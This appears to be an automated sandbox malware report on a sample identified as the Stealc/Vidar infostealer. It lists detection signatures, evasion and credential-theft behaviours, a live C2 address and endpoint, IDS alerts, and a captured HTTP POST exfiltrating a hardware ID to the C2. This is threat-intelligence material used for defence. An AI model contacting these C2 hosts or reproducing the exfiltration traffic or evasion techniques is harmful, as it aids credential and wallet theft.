Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519040
MD5:	9bbc1db6151e2794c605440a57bcbe4d
SHA1:	888858c25bf9bb5d8c938bc01d343bb5799cc8d7
SHA256:	c7477e851ddc9424bb16303e6568aeeda074bf7dfad539e7df78aee2833119b0
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9BBC1DB6151E2794C605440A57BCBE4D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1436762583.0000000004D80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7608	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7608	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7608	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.3c0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:09.723464+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.8	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:09.722013+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.8	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:09.954248+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.8	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:11.653888+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.8	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:10.013564+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.8	49704	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:09.358020+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49704	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T06:00:12.120171+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:18.247351+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:19.321070+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:19.926526+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:20.458925+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:22.422659+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:23.942013+0200	2803304	3	Unknown Traffic	192.168.2.8	49704	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 43 44 37 32 45 37 38 46 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"D4CD72E78F9C2545466276------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"save------HDAFIIDAKJDGDHIDAKJJ--

Source: file.exe, 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dlla
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1663758105.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll/~
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllE
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll5
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2
Source: file.exe, 00000000.00000002.1663758105.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpKKJJKJEGIECAKJJEB
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpM
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpbird
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.jsonl
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpinomi
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpp
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpq
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpefox
Source: file.exe, 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37h
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1688956452.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FCGCFCAF.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: FCGCFCAF.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FCGCFCAF.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: FCGCFCAF.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, file.exe, 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, file.exe, 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: file.exe	String found in binary or memory: https://www.mozilla.org/contribute/https://www.mozilla.org/about/https://www.mozilla.org/firefox/?ut
Source: KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1620916501.000000002F897000.00000004.00000020.00020000.00000000.sdmp, KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx

System Summary

PE file contains section with special chars

